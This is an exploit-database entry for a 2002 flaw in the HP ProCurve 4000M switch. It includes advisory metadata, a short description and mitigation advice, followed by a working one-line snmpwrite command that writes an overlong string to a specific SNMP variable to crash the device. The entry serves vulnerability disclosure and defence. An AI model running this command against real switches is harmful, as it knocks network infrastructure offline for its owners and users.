header-logo
Suggest Exploit
vendor:
ProCurve 4000M Switch
by:
SecurityFocus
8.8
CVSS
HIGH
SNMP Write Access
20
CWE
Product Name: ProCurve 4000M Switch
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

HP ProCurve 4000M Switch SNMP Write Access

An attacker with SNMP write access to the HP ProCurve 4000M Switch can write more than 85 characters to the SNMP variable .iso.3.6.1.4.1.11.2.36.1.1.2.1.0, causing the device to crash the next time it accepts a connection to either the configured telnet or HTTP port.

Mitigation:

Restrict SNMP write access to the device.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5336/info

An issue has been reported with the HP ProCurve 4000M Switch.

An attacker with SNMP write access to the device may write to the SNMP variable .iso.3.6.1.4.1.11.2.36.1.1.2.1.0. If more than 85 characters are written to this variable, the device will crash the next time it accepts a connection to either the configured telnet or HTTP port. 

snmpwrite <switch_ip> private .iso.3.6.1.4.1.11.2.36.1.1.2.1.0 s `perl -e 'print "A"x85;'`

Navigation

Suggest Exploit

Services By CQR